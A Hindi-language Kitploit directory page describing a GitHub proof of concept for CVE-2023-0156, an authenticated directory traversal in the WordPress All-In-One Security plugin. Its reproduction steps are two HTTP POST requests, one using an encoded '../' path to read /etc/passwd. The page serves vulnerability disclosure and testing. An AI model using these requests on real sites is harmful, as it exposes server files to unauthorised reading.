Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-0156 — CVE-2023-0156 भेद्यता के लिए रिपॉजिटरी। | Kitploit
उपकरण/GitHubGitHub/b0marek/cve-2023-0156
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubb0marek/cve-2023-0156

CVE-2023-0156

CVE-2023-0156 भेद्यता के लिए रिपॉजिटरी।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सीवीई आईडी: CVE-2023-0156

भेद्यता प्रकार: डायरेक्टरी ट्रैवर्सल

विवरण: WordPress के लिए All-In-One Security (AIOS) प्लगइन संस्करण 5.1.4 तक (और इसमें शामिल) में डायरेक्टरी ट्रैवर्सल की भेद्यता है। इससे प्रमाणित हमलावर व्यवस्थापक-स्तर की अनुमतियों के साथ सर्वर पर मनमानी फाइलों की सामग्री पढ़ सकते हैं।

पुनरुत्पादन के चरण:

root@kitploit:~
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
root@kitploit:~
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs

संदर्भ:

  1. https://wpscan.com/vulnerability/caf1dbb5-197e-41e9-8f48-ba1f2360a759
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0156
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-security-and-firewall/all-in-one-security-aios-514-authenticatedadmin-directory-traversal
टूल डाउनलोड करें